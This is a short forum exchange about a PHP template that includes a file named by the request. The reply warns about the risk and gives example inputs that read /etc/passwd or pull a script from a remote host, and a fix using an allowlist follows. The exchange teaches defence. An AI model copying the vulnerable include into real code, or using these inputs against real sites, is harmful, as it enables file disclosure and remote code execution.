Quote:
|
Originally Posted by saul
I figure I can instead have a generic template that can include and populate any form, heck, the form name itself can also be a dynamic entity passed in the request:
<?php
// ...special code to populate form...
include($_REQUEST['query_form_filename']);
?>
|
Not a good idea since it opens holes in your application.
index.php?query_form_filename=/etc/passwd or index.php?query_form_filename=http://host/nastyscript.txt for example.
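
One way to keep the generic template without letting the request choose a path, shown as an added example that is not part of the original posts: the request value is looked up in a fixed allowlist and is never itself used as a filename. The form names, file names and the `forms` directory are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: request value => template file under FORM_DIR.
const FORM_DIR = __DIR__ . '/forms';
const FORMS = [
    'contact' => 'contact_form.php',
    'search'  => 'search_form.php',
];

/**
 * Map the untrusted request value to a file path, or null if it is not allowed.
 * The value is only ever used as an array key, so paths, "../" sequences and
 * URLs cannot reach include.
 */
function resolve_form(mixed $requested): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, FORMS)) {
        return null;
    }
    return FORM_DIR . '/' . FORMS[$requested];
}

/** Include the form if it is allowed and present; the caller sends a 404 on false. */
function include_form(mixed $requested): bool
{
    $path = resolve_form($requested);
    if ($path === null || !is_file($path)) {
        return false;
    }
    include $path;
    return true;
}

// Constructed sample inputs, including the two values from the reply above.
$samples = ['contact', '/etc/passwd', 'http://host/nastyscript.txt',
            '../forms/contact_form.php', ['contact']];
foreach ($samples as $value) {
    $path = resolve_form($value);
    printf("%-32s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), $path ?? 'REJECTED');
}
```

In the template, `include_form($_REQUEST['query_form_filename'] ?? null)` replaces the direct `include`. Keeping PHP's `allow_url_include` setting off (its default) additionally blocks the remote-URL case even where an unchecked include remains.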